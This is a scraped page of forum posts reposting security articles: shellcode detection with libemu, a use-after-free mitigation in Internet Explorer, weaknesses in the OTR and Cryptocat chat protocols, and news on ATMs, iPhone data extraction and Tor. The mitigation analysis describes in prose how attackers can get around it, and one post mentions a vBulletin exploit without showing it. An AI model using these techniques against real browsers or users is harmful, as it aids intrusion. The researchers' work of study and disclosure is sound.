#armitage, or #pssec under harmj0y. And if you’re doing the Blackhat/Defcon gauntlet this year, come check out the Veil-Framework BH Arsenal booth and/or my presentation on post-exploitation, as well as all the other awesome talks lined up this year! Sursa: Pass-the-Hash is Dead: Long Live Pass-the-Hash – harmj0y
  14. [h=2]On Breaking PHP-based cross-site scripting protection Mechanisms in the wild[/h] A talk by Ashar Javed @ Garage4Hackers WebCast (28-07-2014) Previously presented at OWASP Spain Chapter Meeting 13-06-2014, Barcelona (Spain) Slides: On Breaking PHP-Based Cross-Site Scripting Protections In The Wild by Ashar Javed
  15. Shellcode Detection and Emulation with Libemu Introduction Libemu is a library which can be used for x86 emulation and shellcode detection. Libemu can be used in IDS/IPS/Honeypot systems for emulating the x86 shellcode, which can be further processed to detect malicious behavior. It can also be used together with Wireshark to pull shellcode off the wire to be analyzed, analyze shellcode inside malicous .rtf/.pdf documents, etc. It has a lot of use-cases and is used in numerous open-source projects like dionaea, thug, peepdf, pyew, etc., and it plays an integral part in shellcode analysis. Libemu can detect and execute shellcode by using the GetPC heuristics, as we will see later in the article. The very first thing we can do is download Libemu via Git with the following command: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]# git clone git://git.carnivore.it/libemu.git [/TD] [/TR] [/TABLE] If we would like to know how much code has been written for this project, we can simply execute sloccount, which will output the number of lines for each subdirectory and a total of 43,742 AnsiC code lines and 15 Python code lines. If we would rather take a look at nice graphs, we can visit the Ohloh web page to see something like below, where it’s evident that about 50k lines of code has been written. The installation instructions can be found at [1], which is why we won’t describe them in this article. We can also install the Pylibemu, so we can interact with Libemu directly from Python. Articol complet: Shellcode Detection and Emulation with Libemu - InfoSec Institute
  16. Hacker turns ATM into 'Doom' arcade game by Lisa Vaas on July 29, 2014 Ever watched a Whirlpool washing machine explode after bouncing around the back yard for 3:42 minutes, a chunk of heavy metal ripping it to shreds from the inside out? There's a hacker responsible for this appliance torture, which he's now expanded to include rigging an ATM so you can play Doom on it (this involves less trauma than the washing machine, in that the ATM survives). Mashable identified the cash machine hacker as an "ingenious Australian lad", Ed Jones, who goes by the handle Aussie50. He says this about what he calls his engineering/scrap metal recycling work: I have a Tenancy to Destroy that which is not useful or repairable, or simply disobeys me. so be sure to watch my motor/appliance destruction videos if you are into stress testing things to the MAX! [sic] Over the weekend, Aussie50 posted a showing off an ATM with its guts exposed, its original PIN pad turned into an arcade controller, the side panel used to select weapons. Its screen now eschews balances and transfers in favor of the familiar sight of a hand wrapped around a gun, going around dark corners and blasting stuff. Were you aware that ATMs - at least the NCR Personas ATM model Aussie50 and his software/wiring/logic partner Julian picked up - have a stereo soundboard in the back? Aussie50 now knows that. Sound system aside, questions abound. For one, can we play with it? That might be on the cards: Aussie50 said in the YouTube comments that he's mulling getting a coin mechanism to install below the card reader. But more security-focused is the question of where the hardware reconfiguration artist got this ATM. Did he pick it up on eBay? Also, should we worry about malicious hackers getting their hands on ATMs and rigging them so as to swindle funds? The answer, of course, is that they've already figured that stuff out. Recent examples of attackers getting into the juicy guts of publicly accessible ATMs abound. One memorable incident, from June, involved two Canadian 14-year-olds who came across an old ATM operators manual online, used its instructions to get into the machine's operator mode, broke into a local market's bank ATM on their school lunch break, printed off documentation regarding how much money was inside and how many withdrawals had been made that day, and changed the surcharge amount to one cent. In the case of that daring duo, I was initially blindsided by the fact that they were precocious tots who reported it to the bank without attempting to profit off their new-found knowledge. They could have wound up in a world of trouble, and/or they could have broken the system they were playing with. For example, as Naked Security's Paul Ducklin pointed out, the kids could have unwittingly triggered a mechanical test sequence that resulted in it spitting out banknotes, which would have left them in the tricky position of having turned into bank robbers. Given that Aussie50's hobby involves scrap metal recycling, we'll assume that he legally procured his ATM of Doom - therefore, he didn't need prior authorization to access somebody else's ATM's computer system (and innards!). Otherwise, if he were playing with somebody else's hardware, one would hope he'd get the go-ahead from the owner(s) of the system he targeted. That's how so-called "white-hat" hackers do it, Paul pointed out: True "white hat" penetration testers don't take the first step without making sure that the scope of their work is known and condoned in writing by their customer. (They don't call it the "get out of jail free" letter for nothing.) Sursa: Hacker turns ATM into ‘Doom’ arcade game | Naked Security
  17. CVE: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5102
  18. Apple Admits Encrypted iPhone Personal Data Can Be Extracted From 'Trusted' Computers By Dennis Lynch@neato_itsdennis on July 25 2014 10:15 PM Apple Inc. acknowledged on Friday that backup encrypted texts, photos and contacts can be extracted from iPhone by anyone with knowledge of extraction techniques, like Apple employees and law enforcement, Reuters reported. Anyone who wants access to that information just needs access to a computer that a user has “trusted” with data from his or her iPhone. Apple says it’s only for diagnostic purposes, so “enterprise IT departments, developers and Apple [troubleshooters]” can access your phone’s technical data, and isn’t a security issue. “A user must have unlocked their device and agreed to trust another computer before that computer is able to access this limited diagnostic data,” Apple said. “As we have said before, Apple has never worked with any government agency from any country to create a backdoor in any of our products or services.” The issue was revealed by a self-proclaimed “hacker” and security researcher Jonathan Zdziarski last week at the Hackers on Planet Earth conference in New York City. He says law enforcement or people with malicious intent could access the data in the same way an Apple “Genius” would access it. He calls it a security “back door,” but insists he’s not accusing Apple of “anything malicious” or of “working with the NSA,” but that the flaw is there and could be used by someone seeking personal information. One Twitter user who appears to “jailbreak” iPhones, or unlock them from Apple software limitations, expressed his disapproval of Zdziarski’s reveal, saying he was “giving away all the secrets!” Sursa: Apple Admits Encrypted iPhone Personal Data Can Be Extracted From 'Trusted' Computers
  19. Efficacy of MemoryProtection against use-after-free vulnerabilities Simon_Z| July 28, 2014 As of the July 2014 patch of Internet Explorer, Microsoft has taken a major step in the evolution of exploit mitigations built into its browser. The new mitigation technology is called MemoryProtection (or MemProtect, for short) and has been shown to be quite effective against a range of use-after-free (UAF) vulnerabilities. Not all UAFs are equally affected, however. Here we’ll discuss what MemoryProtection is and how it operates, and evaluate its effectiveness against various types of UAFs. High-Level Description of MemoryProtection The heart of MemoryProtection is a new strategy for freeing memory on the heap. When typical C++ code compiled for the Windows platform wishes to free a block of memory on the heap, the operation is implemented by a call to HeapFree. This is a call to the Windows heap manager, and it immediately makes the memory block available for reuse in future allocations. With MemoryProtection, when code wishes to free heap memory, the memory is not immediately freed at the heap manager level. Consequently, the memory is not made available for future allocations – at least not for a very important window in time. Instead of returning the memory to the Windows heap manager, MemoryProtection keeps the memory in an allocated state (as far as the heap manager is concerned), fills the memory with zeroes, and tracks the memory block on a list that MemoryProtection maintains of memory blocks waiting to be freed at the heap manager level. MemoryProtection will ultimately free the block at the heap manager level when it performs a periodic memory reclamation sweep, but only if the stack contains no outstanding references to the block. Since application-level frees and heap manager-level frees no longer occur at the same time, there is room for confusion whenever a “free” is mentioned. For the purposes of this post, a “free” will mean an application-level free unless specified otherwise. Also, when speaking of a free at the heap manager level we will sometimes speak of the memory being “released” or “returned” to the heap manager. Detailed Description of MemoryProtection MemoryProtection maintains a per-thread list of freed memory blocks that are still waiting to be freed at the heap manager level. We will call this the “wait list”. When code in Internet Explorer wishes to free a block of memory on the heap, it calls the function MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree. (Note, however, that in many places this function is inlined, which means that its body is copied in its entirety into the compiled code of other functions.) This method performs the following steps: 1. Check if the wait list for the current thread contains at least 100,000 total bytes of memory waiting to be freed at the heap manager level. If so, perform a reclamation sweep (see below). 2. Add an entry to the current thread’s wait list, recording the block’s address, its size, and whether the block resides on the regular process heap or on the isolated heap. 3. Fill the memory block with zeroes. To perform a reclamation sweep, the steps are as follows. These steps are implemented by MemoryProtection::CMemoryProtector::MarkBlocks and MemoryProtection::CMemoryProtector:: ReclaimUnmarkedBlocks. All operations apply to the current thread’s wait list only. 1. Sort the wait list in increasing order of block address. 2. Place a mark on every wait list entry whose block is still pointed to by a pointer residing on the current thread’s stack. The pointer could be either a pointer to the start of the block or a pointer to any memory location falling within the block’s address range. 3. Iterate over the wait list. For each wait list entry encountered that is not marked, release the memory block at the heap manager level via an actual call to HeapFree, and remove the block from the wait list. Remove all marks from marked entries. In addition, an unconditional reclamation step is performed periodically. This occurs each time Internet Explorer’s WndProc is entered to service a message for the thread’s main window. At that time, the entire wait list is emptied and all waiting blocks are returned to the heap manager. The function performing this action is MemoryProtection::CMemoryProtector::ReclaimMemoryWithoutProtection. For efficiency, the wait list is rearranged in certain ways while performing the iteration in step 3 above. Therefore blocks are not necessarily freed in order of increasing address, nor are they always freed in the same order in which they are placed on the wait list. For research and debugging purposes it is often useful to be able to observe the behavior of Internet Explorer without MemoryProtection. In particular, MemoryProtection will interfere with the ability to use the heap manager’s call stack database to capture the call stack at the time of an application-level free. (By the same token, MemoryProtection actually makes it easier to capture the call stack at the time of allocation.) MemoryProtection can effectively be turned off via a manual procedure by writing the value 0xffffffff to the variable MSHTML!MemoryProtection::CMemoryProtector::tlsSlotForInstance. In WinDbg, this can be done via the following command: ed MSHTML!MemoryProtection::CMemoryProtector::tlsSlotForInstance 0xffffffff Effect of MemoryProtection on UAFs When an IE exploit leveraging a UAF is run unmodified against the newly MemoryProtection-enabled IE, the result will often resemble a null-pointer dereference. At the point in time when the exploit attempts to perform an allocation reusing memory from the freed block, the original memory block has not yet been returned to the heap manager; as a result, the exploit code fails to cause a new allocation at that location. Ultimately, when IE makes its improper use of the freed memory, any data read consists of zeroes. Often this will cause a quick and harmless termination of the IE process when the zero value is interpreted as a pointer and is dereferenced. It’s important to realize that even when the symptom appears to indicate that the bug is a null-pointer dereference, the underlying cause actually may be a UAF and a potential security risk. Let’s consider how an attacker might be able to modify the exploit in order to evade MemoryProtection. For a successful attack, the exploit must be able to trigger a memory sweep in between the free and the reallocation. Furthermore, at the time of this sweep, the stack must not contain any outstanding references to the freed block. It follows that there are some UAFs that are impossible to exploit under MemoryProtection. Specifically: If an outstanding stack reference exists for the entire period of time between the free and the later use, then it is impossible to cause reclamation of the freed block. This is a common situation that accounts for a large percentage of UAFs. Many UAFs are the result of a situation in which a free occurring at a deeper level in the call stack leaves a dangling pointer (sometimes a “this” pointer) at a higher level in the call stack. The crash occurs when the stack is popped to the level at which the dangling pointer resides. This very common type of UAF is now non-exploitable. As for UAFs not falling into the above category, however, the situation is quite different. Consider the case of a UAF in which a certain script action results in a dangling pointer being stored in heap memory, more or less permanently – by which we mean that the dangling pointer remains in place even after the return of all currently executing functions. The malicious script can then trigger the use of the dangling pointer at a much later point in time. We call these “long-lived” UAFs. In the case of a long-lived UAF, MemoryProtection offers no real defense. An attacker can ensure that the memory block is freed at the heap manager level by allowing Internet Explorer’s message loop to execute, as this will trigger an unconditional release of all waiting blocks. Though it may seem that the additional blocks released during this sweep have the potential to disrupt the exploit by causing various heap coalesces that are hard to predict, this problem can largely be eliminated by properly preparing the wait list so it will contain a minimum of entries at the time of the sweep. For UAFs not falling into the above categories MemoryProtection may provide partial or full mitigation. Consider the common case of a UAF in which the free and the use occur within the same script method. In the past, some of these have been exploitable conditions. MemoryProtection adds some additional hurdles that an attacker must clear. By referring to the ProtectedFree algorithm above, you can see that when IE calls ProtectedFree on a block of memory, the memory is never returned to the Windows heap manager at that time – not even if the wait list is very full. The return of the memory to the heap manager will always be delayed at least until the next call to ProtectedFree, at which point a sweep could occur. Therefore, an additional hurdle for an attacker in this situation is to find a way to force an additional free in between the free and the reallocation. This additional free must be performed on the same thread as the original free, since wait lists are maintained on a per-thread basis. For certain bugs this additional requirement will make exploitation impossible or too unreliable for use by an adversary. In other cases, when it is easy to force an additional free, MemoryProtection provides a weak form of protection by making it a bit more complex to arrange for a desired sequence of frees at the heap manager level. Typically it is possible to evade this protection through the addition of additional script actions that prepare the wait list, forcing it into a known desired state containing only a small number of entries. In Summary MemoryProtection is a significant new mitigation that makes Internet Explorer more secure by eliminating entire classes of UAFs and rendering them non-exploitable. For other classes of UAFs MemoryProtection is ineffective or only partially effective. Researchers should be aware that some IE crashes that appear to be null-pointer dereferences actually mask an underlying exploitable bug. Simon Zuckerbraun Security Researcher, HP ZDI Sursa: Efficacy of MemoryProtection against use-after-fre... - HP Enterprise Business Community
  20. Breaking Antivirus Software Joxean Koret, COSEINC SYSCAN 360, 2014 - Introduction - Attacking antivirus engines - Finding vulnerabilities - Exploiting antivirus engines - Antivirus vulnerabilities - Conclusions - Recommendations Download: http://www.syscan360.org/slides/2014_EN_BreakingAVSoftware_JoxeanKoret.pdf
  21. [h=3]Noodling about IM protocols[/h]The last couple of months have been a bit slow in the blogging department. It's hard to blog when there are exciting things going on. But also: I've been a bit blocked. I have two or three posts half-written, none of which I can quite get out the door. Instead of writing and re-writing the same posts again, I figured I might break the impasse by changing the subject. Usually the easiest way to do this is to pick some random protocol and poke at it for a while to see what we learn. The protocols I'm going to look at today aren't particularly 'random' -- they're both popular encrypted instant messaging protocols. The first is OTR (Off the Record Messaging). The second is Cryptocat's group chat protocol. Each of these protocols has a similar end-goal, but they get there in slightly different ways. I want to be clear from the start that thisposthas absolutely no destination. If you're looking for exciting vulnerabilities in protocols, go check out someone else's blog. This is pure noodling. The OTR protocol OTR is probably the most widely-used protocol for encrypting instant messages. If you use IM clients like Adium, Pidgin or ChatSecure, you already have OTR support. You can enable it in some other clients through plugins and overlays. OTR was originally developed by Borisov, Goldberg and Brewer and has rapidly come to dominate its niche. Mostly this is because Borisov et al. are smart researchers who know what they’re doing. Also: they picked a cool name and released working code. OTR works within the technical and usage constraints of your typical IM system. Roughly speaking, these are: Messages must be ASCII-formatted and have some (short) maximum length. Users won't bother to exchange keys, so authentication should be "lazy" (i.e., you can authenticate your partners after the fact). Your chat partners are all FBI informants so your chat transcripts must be plausibly deniable -- so as to keep them from being used as evidence against you in a court of law. Coming to this problem fresh, you might find goal (3) a bit odd. In fact, to the best of my knowledge no court in the history of law has ever used a cryptographic transcript as evidence that a conversation occurred. However it must be noted that this requirement makes the problem a bit more sexy. So let's go with it! [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]"Dammit, they used a deniable key exchange protocol" said no Federal prosecutor ever.[/TD] [/TR] [/TABLE] The OTR (version 2/3) handshake is based on the SIGMA key exchange protocol. Briefly, it assumes that both parties generate long-term DSA public keys which we'll denote by (pubA, pubB). Next the parties interact as follows: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]The OTRv2/v3 AKE. Diagram by Bonneau and Morrison, all colorful stuff added. There's also an OTRv1 protocol that's too horrible to talk about here.[/TD] [/TR] [/TABLE] There are four elements to this protocol: Hash commitment. First, Bob commits to his share of a Diffie-Hellman key exchange (g^x) by encrypting it under a random AES key r and sending the ciphertext and a hash of g^x over to Alice. Diffie-Hellman Key Exchange. Next, Alice sends her half of the key exchange protocol (g^y). Bob can now 'open' his share to Alice by sending the AES key r that he used to encrypt it in the previous step. Alice can decrypt this value and check that it matches the hash Bob sent in the first message. Now that both sides have the shares (g^x, g^y) they each use their secrets to compute a shared secret g^{xy} and hash the value several ways to establish shared encryption keys (c', Km2, Km'2) for subsequent messages. In addition, each party hashes g^{xy} to obtain a short "session ID". The sole purpose of the commitment phase (step 1) is to prevent either Alice or Bob from controlling the value of the shared secret g^{xy}. Since the session ID value is derived by hashing the Diffie-Hellman shared secret, it's possible to use a relatively short session ID value to authenticate the channel, since neither Alice nor Bob will be able to force this ID to a specific value. Exchange of long-term keys and signatures. So far Alice and Bob have not actually authenticated that they're talking to each other, hence their Diffie-Hellman exchange could have been intercepted by a man-in-the-middle attacker. Using the encrypted channel they've previously established, they now set about to fix this. Alice and Bob each send their long-term DSA public key (pubA, pubB) and key identifiers, as well as a signature on (a MAC of) the specific elements of the Diffie-Hellman message (g^x, g^y) and their view of which party they're communicating with. They can each verify these signatures and abort the connection if something's amiss.** Revealing MAC keys. After sending a MAC, each party waits for an authenticated response from its partner. It then reveals the MAC keys for the previous messages. Lazy authentication. Of course if Alice and Bob never exchange public keys, this whole protocol execution is still vulnerable to a man-in-the-middle (MITM) attack. To verify that nothing's amiss, both Alice and Bob should eventually authenticate each other. OTR provides three mechanisms for doing this: parties may exchange fingerprints (essentially hashes) of (pubA, pubB) via a second channel. Alternatively, they can exchange the "session ID" calculated in the second phase of the protocol. A final approach is to use the Socialist Millionaires' Problem to prove that both parties share the same secret. The OTR key exchange provides the following properties: Protecting user identities. No user-identifying information (e.g., long-term public keys) is sent until the parties have first established a secure channel using Diffie-Hellman. The upshot is that a purely passive attacker doesn't learn the identity of the communicating partners -- beyond what's revealed by the higher-level IM transport protocol.* Unfortunately this protection fails against an active attacker, who can easily smash an existing OTR connection to force a new key agreement and run an MITM on the Diffie-Hellman used during the next key agreement. This does not allow the attacker to intercept actual message content -- she'll get caught when the signatures don't check out -- but she can view the public keys being exchanged. From the client point of view the likely symptoms are a mysterious OTR error, followed immediately by a successful handshake. One consequence of this is that an attacker could conceivably determine which of several clients you're using to initiate a connection. Weak deniability. The main goal of the OTR designers is plausible deniability. Roughly, this means that when you and I communicate there should be no binding evidence that we really had the conversation. This rules out obvious solutions like GPG-based chats, where individual messages would be digitally signed, making them non-repudiable. Properly defining deniability is a bit complex. The standard approach is to show the existence of an efficient 'simulator' -- in plain English, an algorithm for making fake transcripts. The theory is simple: if it's trivial to make fake transcripts, then a transcript can hardly be viewed as evidence that a conversation really occurred. OTR's handshake doesn't quite achieve 'strong' deniability -- meaning that anyone can fake a transcript between any two parties -- mainly because it uses signatures. As signatures are non-repudiable, there's no way to fake one without actually knowing your public key. This reveals that we did, in fact, communicate at some point. Moreover, it's possible to create an evidence trail that I communicated with you, e.g., by encoding my identity into my Diffie-Hellman share (g^x). At very least I can show that at some point you were online and we did have contact. But proving contact is not the same thing as proving that a specific conversation occurred. And this is what OTR works to prevent. The guarantee OTR provides is that if the target was online at some point and you could contact them, there's an algorithm that can fake just about any conversation with the individual. Since OTR clients are, by design, willing to initiate a key exchange with just about anyone, merely putting your client online makes it easy for people to fake such transcripts.*** Towards strong deniability. The 'weak' deniability of OTR requires at least tacit participation of the user (Bob) for which we're faking the transcript. This isn't a bad property, but in practice it means that fake transcripts can only be produced by either Bob himself, or someone interacting online with Bob. This certainly cuts down on your degree of deniability. A related concept is 'strong deniability', which ensures that any party can fake a transcript using only public information (e.g., your public keys). OTR doesn't try achieve strong deniability -- but it does try for something in between. The OTR version of deniability holds that an attacker who obtains the network traffic of a real conversation -- even if they aren't one of the participants -- should be able alter the conversation to say anything he wants. Sort of. The rough outline of the OTR deniability process is to generate a new message authentication key for each message (using Diffie-Hellman) and then reveal those keys once they've been used up. In theory, a third party can obtain this transcript and -- if they know the original message content -- they can 'maul' the AES-CTR encrypted messages into messages of their choice, then they can forge their own MACs on the new messages. [TABLE=class: tr-caption-container, align: center] [TR] [TD][/TD] [/TR] [TR] [TD=class: tr-caption]OTR message transport (source: Bonneau and Morrison, all colored stuff added).[/TD] [/TR] [/TABLE] Thus our hypothetical transcript forger can take an old transcript that says "would you like a Pizza" and turn it into a valid transcript that says, for example, "would you like to hack STRATFOR"... Except that they probably can't, since the first message is too short and... oh lord, this whole thing is a stupid idea -- let's stop talking about it. The OTRv1 handshake. Oh yes, there's also an OTRv1 protocol that has a few issues and isn't really deniable. Even better, an MITM attacker can force two clients to downgrade to it, provided both support that version. Yuck. So that's the OTR protocol. While I've pointed out a few minor issues above, the truth is that the protocol is generally an excellent way to communicate. In fact it's such a good idea that if you really care about secrecy it's probably one of the best options out there. Cryptocat Since we're looking at IM protocols I thought it might be nice to contrast with another fairly popular chat protocol: Cryptocat's group chat. Cryptocat is a web-based encrypted chat app that now runs on iOS (and also in Thomas Ptacek's darkest nightmares). Cryptocat implements OTR for 'private' two-party conversations. However OTR is not the default. If you use Cryptocat in its default configuration, you'll be using its hand-rolled protocol for group chats. The Cryptocat group chat specification can be found here, and it's remarkably simple. There are no "long-term" keys in Cryptocat. Diffie-Hellman keys are generated at the beginning of each session and re-used for all conversations until the app quits. Here's the handshake between two parties: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Cryptocat group chat handshake (current revision). Setting is Curve25519. Keys are generated when the application launches, and re-used through the session.[/TD] [/TR] [/TABLE] If multiple people join the room, every pair of users repeats this handshake to derive a shared secret between every pair of users. Individuals are expected to verify each others' keys by checking fingerprints and/or running the Socialist Millionaire protocol. Unlike OTR, the Cryptocat handshake includes no key confirmation messages, nor does it attempt to bind users to their identity or chat room. One implication of this is that I can transmit someone else's public key as if it were my own -- and the recipients of this transmission will believe that the person is actually part of the chat. Moreover, since public keys aren't bound to the user's identity or the chat room, you could potentially route messages between a different user (even a user in a different chat room) while making it look like they're talking to you. Since Cryptocat is a group chat protocol, there might be some interesting things you could do to manipulate the conversation in this setting.**** Does any of this matter? Probably not that much, but it would be relatively easy (and good) to fix these issues. Message transmission and consistency. The next interesting aspect of Cryptocat is the way it transmits encrypted chat messages. One of the core goals of Cryptocat is to ensure that messages are consistent between individual users. This means that all users should be able to verify that the other user is receiving the same data as it is. Cryptocat uses a slightly complex mechanism to achieve this. For each pair of users in the chat, Cryptocat derives an AES key and an MAC key from the Diffie-Hellman shared secret. To send a message, the client: Pads the message by appending 64 bytes of random padding. Generates a random 12-byte Initialization Vector for each of the N users in the chat. Encrypts the message using AES-CTR under the shared encryption key for each user. Concatenates all of the N resulting ciphertexts/IVs and computes an HMAC of the whole blob under each recipient's key. Calculates a 'tag' for the message by hashing the following data: padded plaintext || HMAC-SHA512alice || HMAC-SHA512bob || HMAC-SHA512carol || ... Broadcasts the N ciphertexts, IVs, MACs and the single 'tag' value to all users in the conversation. When a recipient receives a message from another user, it verifies that: The message contains a valid HMAC under its shared key. This IV has not been received before from this sender. The decrypted plaintext is consistent with the 'tag'. Roughly speaking, the idea here is to make sure that every user receives the same message. The use of a hashed plaintext is a bit ugly, but the argument here is that the random padding protects the message from guessing attacks. Make what you will of this. Anti-replay. Cryptocat also seeks to prevent replay attacks, e.g., where an attacker manipulates a conversation by simply replaying (or reflecting) messages between users, so that users appear to be repeating statements. For example, consider the following chat transcripts: [TABLE=class: tr-caption-container, align: center] [TR] [TD][/TD] [/TR] [TR] [TD=class: tr-caption]Replays and reflection attacks. [/TD] [/TR] [/TABLE] Replay attacks are prevented through the use of a global 'IV array' that stores all previously received and sent IVs to/from all users. If a duplicate IV arrives, Cryptocat will reject the message. This is unwieldy but it generally seems ok to prevent replays and reflection. A limitation of this approach is that the IV array does not live forever. In fact, from time to time Cryptocat will reset the IV array without regenerating the client key. This means that if Alice and Bob both stay online, they can repeat the key exchange and wind up using the same key again -- which makes them both vulnerable to subsequent replays and reflections. (Update: This issue has since been fixed). In general the solution to these issues is threefold: Keys shouldn't be long-term, but should be regenerated using new random components for each key exchange. Different keys should be derived for the Alice->Bob and Bob->Alice direction It would be be more elegant to use a message counter than to use this big, unwieldy key array. The good news is that the Cryptocat developers are working on a totally new version of the multi-party chat protocol that should be enormously better. In conclusion I said this would be a post that goes nowhere, and I delivered! But I have to admit, it helps to push it out of my system. None of the issues I note above are the biggest deal in the world. They're all subtle issues, which illustrates two things: first, that crypto is hard to get right. But also: that crypto rarely fails catastrophically. The exciting crypto bugs that cause you real pain are still few and far between. Notes: * In practice, you might argue that the higher-level IM protocol already leaks user identities (e.g., Jabber nicknames). However this is very much an implementation choice. Moreover, even when using Jabber with known nicknames, you might access the Jabber server using one of several different clients (your computer, phone, etc.). Assuming you use Tor, the only indication of this might be the public key you use during OTR. So there's certainly useful information in this protocol. ** Notice that OTR signs a MAC instead of a hash of the user identity information. This happens to be a safe choice given that the MAC used is based on HMAC-SHA2, but it's not generally a safe choice. Swapping the HMAC out for a different MAC function (e.g., CBC-MAC) would be catastrophic. *** To get specific, imagine I wanted to produce a simulated transcript for some conversation with Bob. Provided that Bob's client is online, I can send Bob any g^x value I want. It doesn't matter if he really wants to talk to me -- by default, his client will cheerfully send me back his own g^y and a signature on (g^x, g^y, pub_B, keyid_ which, notably, does not include my identity. From this point on all future authentication is performed using MACs and encrypted under keys that are known to both of us. There's nothing stopping me from faking the rest of the conversation. **** Incidentally, a similar problem exists in the OTRv1 protocol. Posted by Matthew Green at 9:31 AM Sursa: A Few Thoughts on Cryptographic Engineering: Noodling about IM protocols
  22. Black Hat presentation on unmasking TOR users suddenly cancelled Jeremy Kirk, IDG News Service A presentation on a low-budget method to unmask users of a popular online privacy tool, TOR, will no longer go ahead at the Black Hat security conference early next month. The talk was nixed by the legal counsel with Carnegie Mellon’s Software Engineering Institute after a finding that materials from researcher Alexander Volynkin were not approved for public release, according to a notice on the conference’s website. It’s rare but not unprecedented for Black Hat presentations to be cancelled. It was not clear why lawyers felt Volynkin’s presentation should not proceed. Volynkin, a research scientist with the university’s Computer Emergency Response Team (CERT) was due to give a talk entitled “You Don’t Have to be the NSA to Break Tor: Deanonymizing Users on a Budget” at the conference, which take places Aug. 6-7 in Last Vegas. TOR is short for The Onion Router, which is a network of distributed nodes that provide greater privacy by encrypting a person’s browsing traffic and routing that traffic through random proxy servers. Although originally developed by the U.S. Naval Research Laboratory, it is now maintained by The TOR Project. TOR is widely used by both cybercriminals and those with legitimate interests in preserving their anonymity, such as dissidents and journalists. Although TOR masks a computer’s true IP address, advanced attacks have been developed that undermine its effectiveness. Some of Volynkin’s materials were informally shared with The TOR Project, a nonprofit group that oversees the TOR, wrote Roger Dingledine, a co-founder of the organization, in mailing list post on Monday. The TOR Project did not request the talk to be canceled, Dingledine wrote. Also, the group has not received slides or descriptions of Volynkin’s talk that go beyond an abstract that has now been deleted from Black Hat’s website. Dingledine wrote that The TOR Project is working with CERT to do a coordinated disclosure around Volynkin’s findings, possibly later this week. In general, the group encourages researchers to responsibly disclose information about new attacks. “Researchers who have told us about bugs in the past have found us pretty helpful in fixing issues and generally positive to work with,” Dingledine wrote. Sursa: Black Hat presentation on unmasking TOR users suddenly cancelled | PCWorld
  23. DARPA-derived secure microkernel goes open source tomorrow Hacker-repelling, drone-protecting code will soon be yours to tweak as you see fit By Darren Pauli, 28 Jul 2014 A nippy microkernel mathematically proven to be bug free*, and used to protect drones from hacking, will be released as open source tomorrow. The formal-methods-based secure embedded L4 (seL4) microkernel was developed by Australian boffins at National ICT Australia (NICTA) and was part of the US Defense Advanced Research Projects Agency's High-Assurance Cyber Military Systems program hatched in 2012 to stop hackers knocking unmanned birds out of the sky. It was noted as the most advanced and highly-assured member of the L4 microkernel family due to its use of formal methods that did not impact performance. A microkernel differs from monolithic kernels – such as the Linux and Windows kernels – by running as much code as possible – from drivers to system services – in user space, making the whole thing more modular and (in theory) more stable. Tomorrow at noon Eastern Australian Standard Time (GMT +10) seL4's entire source code including proofs and additional code used to build trustworthy systems will be released under the GPL v2 licence. A global group of maths and aviation gurus from the likes of Boeing and Rockwell Collins joined a team of dedicated NICTA researchers on the project which involved the seL4 operating system designed to detect and foil hacking attempts. NICTA senior researcher Doctor June Andronick said the kernel should be considered by anyone building critical systems such as pacemakers and technology-rich cars. "If your software runs the seL4 kernel, you have a guarantee that if a fault happens in one part of the system it cannot propagate to the rest of the system and in particular the critical parts," Andronick said earlier this month. "We provide a formal mathematical proof that this seL4 kernel is correct and guarantees the isolation between components." NICTA demonstrated in a video how a drone which running the platform could detect hacking attempts from ground stations that would normally cause the flight software to die and the aircraft to crash. "What we are demonstrating here is that if one of the ground stations is malicious, and sends a command to the drone to stop the flight software, the commercially-available drone will accept the command, kill the software and just drop from the sky," Andronick said. The researchers' demo drone would instead detect the intrusion at temp, flash its led lights and fly away. This could ensure that real drone missions could continue in the event of hacking attempts by combatants. Andronick said seL4 would come into play as the team added more functionality including navigation, autonomous flight and mission control components. In depth information about seL4 was available on the NICTA website and within the paper Comprehensive Formal Verification of an OS Microkernel. ® * That's bug free according to the formal verification of its specification; design flaws in the specs aren't counted by the team. Sursa: DARPA-derived secure microkernel goes open source tomorrow • The Register
  24. Eu o sa ma multumesc cu asta: Asus RT-AC68U Dual-band Wireless-AC1900 Gigabit Router, USB 3.0, IEEE 802.11a/b/g/n - eMAG.ro Ar mai fi "baiatu vesel": Router Wireless Linksys Smart Wi-Fi WRT1900AC, Dual Band, USB, AC1900 - eMAG.ro Dar prefer ASUS-ul. Prea mare diferenta de pret. Sunt curios cat o sa coste. Si cat de usor poti praji oua langa el.
  25. Those are probably fixed. The exploit does NOT check if the forum is vulnerable. If it shows this error on Home - vBulletin Community Forum it means it was fixed.
×
×
  • Create New...